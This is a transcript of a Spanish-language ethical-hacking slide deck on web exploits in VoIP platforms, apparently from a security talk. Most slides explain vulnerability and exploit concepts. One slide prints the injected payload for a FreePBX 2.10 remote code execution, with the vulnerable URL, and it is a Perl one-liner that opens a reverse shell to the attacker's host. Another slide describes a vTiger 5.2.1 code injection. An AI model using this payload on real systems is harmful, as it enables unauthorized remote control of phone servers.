Web exploits in VoIP Platforms
-
Upload
juan-oliva -
Category
Technology
-
view
240 -
download
3
Transcript of Web exploits in VoIP Platforms
![Page 1: Web exploits in VoIP Platforms](https://reader034.fdocuments.in/reader034/viewer/2022052307/557ab814d8b42acf1b8b4803/html5/thumbnails/1.jpg)
Web Exploiting and Reversing Shell In VoIP Plataforms
![Page 2: Web exploits in VoIP Platforms](https://reader034.fdocuments.in/reader034/viewer/2022052307/557ab814d8b42acf1b8b4803/html5/thumbnails/2.jpg)
$ Whois @jroliva Juan OlivaC|EH, CPTE, OSEH, BNS, dCAA, ECE, LPIC-1, Novell CLA
Proyectos de Ethical HackingProyectos de Voz sobre IP.Blog : jroliva.wordpress.com
Instructor
- Certificación Linux Professional Institute LPI-C1- Certificación de Seguridad de Elastix “ESM”- Curso y taller Ethical Hacking y Voz sobre IP
![Page 3: Web exploits in VoIP Platforms](https://reader034.fdocuments.in/reader034/viewer/2022052307/557ab814d8b42acf1b8b4803/html5/thumbnails/3.jpg)
DESCARGO DE RESPONSABILIDADEsta presentación tiene como propósito proveer unicamente información. No aplicar este material ni conocimientos sin el Consentimiento explícito que autorice a hacerlo. Los lectores (participantes, oyentes, videntes) asumen la responsabilidad completa por la aplicación o experimentación de este material y/o conocimientos presentados. El(los) autor(es) quedan exceptuados de cualquier reclamo directo o indirectorespecto a daños que puedan haber sido causados por la aplicación de este material y/o conocimientos expuestos.
La información aquí expuesta representa las opiniones y perspectivas propias del autor respecto a la materia y no representan ninguna posicion oficial de alguna organización asociada.
![Page 4: Web exploits in VoIP Platforms](https://reader034.fdocuments.in/reader034/viewer/2022052307/557ab814d8b42acf1b8b4803/html5/thumbnails/4.jpg)
INTRODUCCION
![Page 5: Web exploits in VoIP Platforms](https://reader034.fdocuments.in/reader034/viewer/2022052307/557ab814d8b42acf1b8b4803/html5/thumbnails/5.jpg)
VULNERABILIDADFALLO O DEBILIDAD DE UN SISTEMA, PLATAFORMA O APLICACION
ATAQUECOMPROMETER LA SEGURIDAD DEL SISTEMA APROBECANDONOSDE UNA VULNERABILIDAD
CONTRAMEDIDAACCIONES A LLEVAR A CABO PARA EVITAR TENER VULNERABILIDADES
INTRODUCCION
![Page 6: Web exploits in VoIP Platforms](https://reader034.fdocuments.in/reader034/viewer/2022052307/557ab814d8b42acf1b8b4803/html5/thumbnails/6.jpg)
VULNERABILIDADES ESPECIFICAS
- DESBORDAMIENTO DE BUFFER OVERFLOW
- DESBORDAMIENTO DE CARRERA (race condition)
- FORMATO DE CADENA (format string error)
- INYECCIONES SQL (SQL Inyection)
INTRODUCCION
![Page 7: Web exploits in VoIP Platforms](https://reader034.fdocuments.in/reader034/viewer/2022052307/557ab814d8b42acf1b8b4803/html5/thumbnails/7.jpg)
QUE ES UN EXPLOIT
![Page 8: Web exploits in VoIP Platforms](https://reader034.fdocuments.in/reader034/viewer/2022052307/557ab814d8b42acf1b8b4803/html5/thumbnails/8.jpg)
DEFINICIÓN
Un Exploit es un programa o código que "explota" una
vulnerabilidad del sistema de forma manual o totalmente
Automatizada
QUE ES UN EXPLOIT
![Page 9: Web exploits in VoIP Platforms](https://reader034.fdocuments.in/reader034/viewer/2022052307/557ab814d8b42acf1b8b4803/html5/thumbnails/9.jpg)
DEFINICION
Si bien el código que explota la vulnerabilidad no es un código
malicioso en sí mismo, generalmente se utiliza para otros fines
- Acceso no autorizado a un sistema
- Malware como gusanos y troyanos.
QUE ES UN EXPLOIT
![Page 10: Web exploits in VoIP Platforms](https://reader034.fdocuments.in/reader034/viewer/2022052307/557ab814d8b42acf1b8b4803/html5/thumbnails/10.jpg)
TIPOS DE EXPLOIT
![Page 11: Web exploits in VoIP Platforms](https://reader034.fdocuments.in/reader034/viewer/2022052307/557ab814d8b42acf1b8b4803/html5/thumbnails/11.jpg)
REMOTOS
Los que pueden ser lanzados desde una ubicación
Diferente de la red del equipo de la victima (internet)
Si se logra su ejecución es posible tomar el control del equipo
Comprometido parcial o totalmente.
TIPOS DE EXPLOIT
![Page 12: Web exploits in VoIP Platforms](https://reader034.fdocuments.in/reader034/viewer/2022052307/557ab814d8b42acf1b8b4803/html5/thumbnails/12.jpg)
LOCALES
Permiten elevar privilegios de un sistema operativo solo en la
Red local del equipo víctima
TIPOS DE EXPLOIT
![Page 13: Web exploits in VoIP Platforms](https://reader034.fdocuments.in/reader034/viewer/2022052307/557ab814d8b42acf1b8b4803/html5/thumbnails/13.jpg)
DONDE LOS ENCUENTRAN
Existen muchas páginas dónde se publican diferentes tipos
de exploits :
- exploit-db.com
- packetstormsecurity.com
- exploitsdownload.com
- cvedetails.com
![Page 14: Web exploits in VoIP Platforms](https://reader034.fdocuments.in/reader034/viewer/2022052307/557ab814d8b42acf1b8b4803/html5/thumbnails/14.jpg)
COMO SE HACEN LOS EXPLOITS
![Page 15: Web exploits in VoIP Platforms](https://reader034.fdocuments.in/reader034/viewer/2022052307/557ab814d8b42acf1b8b4803/html5/thumbnails/15.jpg)
HERRAMIENTAS DE DESARROLLO
Pueden ser escritos en diferentes lenguajes
Tradicionalmente se realizan en C , perl , bash , nc
COMO SE HACEN LOS EXPLOITS
![Page 16: Web exploits in VoIP Platforms](https://reader034.fdocuments.in/reader034/viewer/2022052307/557ab814d8b42acf1b8b4803/html5/thumbnails/16.jpg)
HERRAMIENTAS DE DESARROLLO
Sin embargo con el desarrollo de los lenguajes y vulnerabilidades
Hoy es posible desarrollar exploits con python o PHP inclusive
COMO SE HACEN LOS EXPLOITS
![Page 17: Web exploits in VoIP Platforms](https://reader034.fdocuments.in/reader034/viewer/2022052307/557ab814d8b42acf1b8b4803/html5/thumbnails/17.jpg)
EL CICLO DE VIDA
![Page 18: Web exploits in VoIP Platforms](https://reader034.fdocuments.in/reader034/viewer/2022052307/557ab814d8b42acf1b8b4803/html5/thumbnails/18.jpg)
CICLO DE VIDA
![Page 19: Web exploits in VoIP Platforms](https://reader034.fdocuments.in/reader034/viewer/2022052307/557ab814d8b42acf1b8b4803/html5/thumbnails/19.jpg)
CICLO DE VIDA
![Page 20: Web exploits in VoIP Platforms](https://reader034.fdocuments.in/reader034/viewer/2022052307/557ab814d8b42acf1b8b4803/html5/thumbnails/20.jpg)
VIENDO APLICACIONES WEB EXPLOTABLES EN PLATAFORMAS VOIP
![Page 21: Web exploits in VoIP Platforms](https://reader034.fdocuments.in/reader034/viewer/2022052307/557ab814d8b42acf1b8b4803/html5/thumbnails/21.jpg)
APLICACIONES WEB EXPLOTABLES EN PLATAFORMAS VOIP
![Page 22: Web exploits in VoIP Platforms](https://reader034.fdocuments.in/reader034/viewer/2022052307/557ab814d8b42acf1b8b4803/html5/thumbnails/22.jpg)
FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution
Vulnerabilidad es de tipo “Remote Code Execution Exploit” ,
es decir inyecta código en una página no autentificada
variables que generan la ejecución de sentencias del sistema
operativo vía la función “system” de asterisk ,
Resultado : genera una conexión reversa desde el host
atacado hacia el host del atacante vía el puerto 443.
![Page 23: Web exploits in VoIP Platforms](https://reader034.fdocuments.in/reader034/viewer/2022052307/557ab814d8b42acf1b8b4803/html5/thumbnails/23.jpg)
Pero como funciona ??
![Page 24: Web exploits in VoIP Platforms](https://reader034.fdocuments.in/reader034/viewer/2022052307/557ab814d8b42acf1b8b4803/html5/thumbnails/24.jpg)
![Page 25: Web exploits in VoIP Platforms](https://reader034.fdocuments.in/reader034/viewer/2022052307/557ab814d8b42acf1b8b4803/html5/thumbnails/25.jpg)
![Page 26: Web exploits in VoIP Platforms](https://reader034.fdocuments.in/reader034/viewer/2022052307/557ab814d8b42acf1b8b4803/html5/thumbnails/26.jpg)
URL A LA CUAL INGRESA EL PROGRAMA:
/recordings/misc/callme_page.php?action=c&callmenum='
![Page 27: Web exploits in VoIP Platforms](https://reader034.fdocuments.in/reader034/viewer/2022052307/557ab814d8b42acf1b8b4803/html5/thumbnails/27.jpg)
CODIGO QUE INYECTA
UN POCO FEO NO ???
![Page 28: Web exploits in VoIP Platforms](https://reader034.fdocuments.in/reader034/viewer/2022052307/557ab814d8b42acf1b8b4803/html5/thumbnails/28.jpg)
CODIGO QUE INYECTA
str(extension) '@from-internal/nApplication: systemData: perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"' str(lhost) ':' str(lport) '");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Ahora si la veo !!
![Page 29: Web exploits in VoIP Platforms](https://reader034.fdocuments.in/reader034/viewer/2022052307/557ab814d8b42acf1b8b4803/html5/thumbnails/29.jpg)
![Page 30: Web exploits in VoIP Platforms](https://reader034.fdocuments.in/reader034/viewer/2022052307/557ab814d8b42acf1b8b4803/html5/thumbnails/30.jpg)
Bingo , tengo shell !!
![Page 31: Web exploits in VoIP Platforms](https://reader034.fdocuments.in/reader034/viewer/2022052307/557ab814d8b42acf1b8b4803/html5/thumbnails/31.jpg)
AHORA VAMOS A LA PRACTICA
DEMO TIME !!
Exploit en Freepbx 2.10
![Page 32: Web exploits in VoIP Platforms](https://reader034.fdocuments.in/reader034/viewer/2022052307/557ab814d8b42acf1b8b4803/html5/thumbnails/32.jpg)
APLICACIONES WEB EXPLOTABLES EN PLATAFORMAS VOIP
![Page 33: Web exploits in VoIP Platforms](https://reader034.fdocuments.in/reader034/viewer/2022052307/557ab814d8b42acf1b8b4803/html5/thumbnails/33.jpg)
PHP CODE INYECTION en VTIGER 5.2.1
Descripción : El fundamento básico de esta técnica, es inyectar
código arbitrario , como lo hace una inyección SQL
Resultado : Obtención de una Shell reversa.
![Page 34: Web exploits in VoIP Platforms](https://reader034.fdocuments.in/reader034/viewer/2022052307/557ab814d8b42acf1b8b4803/html5/thumbnails/34.jpg)
DEMO
Exploit en VTIGER 5.2.1
![Page 35: Web exploits in VoIP Platforms](https://reader034.fdocuments.in/reader034/viewer/2022052307/557ab814d8b42acf1b8b4803/html5/thumbnails/35.jpg)
![Page 36: Web exploits in VoIP Platforms](https://reader034.fdocuments.in/reader034/viewer/2022052307/557ab814d8b42acf1b8b4803/html5/thumbnails/36.jpg)
Gracias !!!
Juan OlivaConsultor en Ethical Hacking y Voipgtalk :[email protected] : @jrolivaBlog : http://jroliva.wordpress.com/